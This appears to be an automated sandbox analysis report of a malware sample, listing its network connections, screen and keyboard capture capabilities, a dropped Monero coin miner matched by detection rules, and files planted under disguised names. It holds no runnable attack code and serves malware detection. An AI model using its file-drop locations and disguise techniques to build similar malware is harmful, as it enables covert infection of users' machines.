                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49746 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49753 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49760 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49768 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49771 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49787 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49817 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49823 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49824 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49829 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49830 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49835 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49836 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49841 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49842 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49847 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49848 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49850 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49851 version: TLS 1.2

                                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                                  barindex
                                  Source: main.exe.12.dr, utils.cs.Net Code: desktopScreenshot
                                  Source: Update.exe.21.dr, utils.cs.Net Code: desktopScreenshot
                                  Source: main.exe.12.dr, utils.cs.Net Code: KeyboardLayout
                                  Source: Update.exe.21.dr, utils.cs.Net Code: KeyboardLayout

                                  System Summary

                                  barindex
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB882B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,7_2_00000235BB882B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,7_2_00000235BB88253C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8828C8 NtEnumerateValueKey,NtEnumerateValueKey,7_2_00000235BB8828C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88202C NtQuerySystemInformation,StrCmpNIW,7_2_00000235BB88202C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB887428C8 NtEnumerateValueKey,NtEnumerateValueKey,8_2_000001EB887428C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,8_2_000001EB8874253C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88742244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,8_2_000001EB88742244
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB88742B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,8_2_000001EB88742B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB887427FC NtEnumerateKey,NtEnumerateKey,8_2_000001EB887427FC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8874202C NtQuerySystemInformation,StrCmpNIW,8_2_000001EB8874202C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00367FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,5_2_00367FD3
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\gqxqtdeqxchk.sys
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\wxyubnjmnlae.tmp
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB210000_2_00007FF6CEB21000
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB29D9B0_2_00007FF6CEB29D9B
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB417200_2_00007FF6CEB41720
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB386700_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB46B500_2_00007FF6CEB46B50
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB27B600_2_00007FF6CEB27B60
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB47A9C0_2_00007FF6CEB47A9C
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB3E80C0_2_00007FF6CEB3E80C
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB386700_2_00007FF6CEB38670
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB4A7D80_2_00007FF6CEB4A7D8
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB29F3B0_2_00007FF6CEB29F3B
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB367500_2_00007FF6CEB36750
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB2A76D0_2_00007FF6CEB2A76D
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB328900_2_00007FF6CEB32890
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB320700_2_00007FF6CEB32070
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB46DCC0_2_00007FF6CEB46DCC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB335400_2_00007FF6CEB33540
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB475500_2_00007FF6CEB47550
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB44EFC0_2_00007FF6CEB44EFC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB426C40_2_00007FF6CEB426C4
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB33ED00_2_00007FF6CEB33ED0
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB38EF40_2_00007FF6CEB38EF4
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB326840_2_00007FF6CEB32684
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB384BC0_2_00007FF6CEB384BC
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB324800_2_00007FF6CEB32480
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB3ECA00_2_00007FF6CEB3ECA0
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB3AC500_2_00007FF6CEB3AC50
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB3F3200_2_00007FF6CEB3F320
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB292D00_2_00007FF6CEB292D0
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB342D40_2_00007FF6CEB342D4
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB417200_2_00007FF6CEB41720
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB32A940_2_00007FF6CEB32A94
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB44A600_2_00007FF6CEB44A60
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB322740_2_00007FF6CEB32274
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 2_2_00007FFDFB3C2F202_2_00007FFDFB3C2F20
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 2_2_00007FFE1A457CA02_2_00007FFE1A457CA0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003699065_2_00369906
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0036F9635_2_0036F963
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0037EA075_2_0037EA07
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00378C7E5_2_00378C7E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003940445_2_00394044
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003760F75_2_003760F7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003721255_2_00372125
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003791115_2_00379111
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003782D05_2_003782D0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0036E3945_2_0036E394
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003714765_2_00371476
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003764455_2_00376445
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003877385_2_00387738
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0037976F5_2_0037976F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003879675_2_00387967
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_003709495_2_00370949
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00363AB75_2_00363AB7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038FA905_2_0038FA90
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00364C6E5_2_00364C6E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00375E865_2_00375E86
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038FF3E5_2_0038FF3E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00370FAC5_2_00370FAC
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00362FCB5_2_00362FCB
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477910386_2_00007FF647791038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477964706_2_00007FF647796470
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477973BC6_2_00007FF6477973BC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477779606_2_00007FF647777960
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477790D06_2_00007FF6477790D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64779A0F86_2_00007FF64779A0F8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64778E11C6_2_00007FF64778E11C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787F4C6_2_00007FF647787F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477887D06_2_00007FF6477887D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647791FE46_2_00007FF647791FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477837E06_2_00007FF6477837E0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64779481C6_2_00007FF64779481C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477860306_2_00007FF647786030
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647771F506_2_00007FF647771F50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647781F946_2_00007FF647781F94
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477966EC6_2_00007FF6477966EC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647782E506_2_00007FF647782E50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647796E706_2_00007FF647796E70
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647781D906_2_00007FF647781D90
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647787D986_2_00007FF647787D98
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64778E5B06_2_00007FF64778E5B0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64778A5306_2_00007FF64778A530
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647783BE46_2_00007FF647783BE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF64778EC306_2_00007FF64778EC30
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477943806_2_00007FF647794380
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF647781B846_2_00007FF647781B84
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477910386_2_00007FF647791038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477823A46_2_00007FF6477823A4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477819806_2_00007FF647781980
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477821A06_2_00007FF6477821A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB851F2C7_2_00000235BB851F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8638A87_2_00000235BB8638A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB85D0E07_2_00000235BB85D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB882B2C7_2_00000235BB882B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8944A87_2_00000235BB8944A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB88DCE07_2_00000235BB88DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8B1F2C7_2_00000235BB8B1F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8C38A87_2_00000235BB8C38A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8BD0E07_2_00000235BB8BD0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD210007_2_00007FF7DFD21000
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD386707_2_00007FF7DFD38670
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD29D9B7_2_00007FF7DFD29D9B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD27B607_2_00007FF7DFD27B60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD46B507_2_00007FF7DFD46B50
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD47A9C7_2_00007FF7DFD47A9C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD328907_2_00007FF7DFD32890
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD320707_2_00007FF7DFD32070
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD3E80C7_2_00007FF7DFD3E80C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD4A7D87_2_00007FF7DFD4A7D8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00007FF7DFD386707_2_00007FF7DFD38670
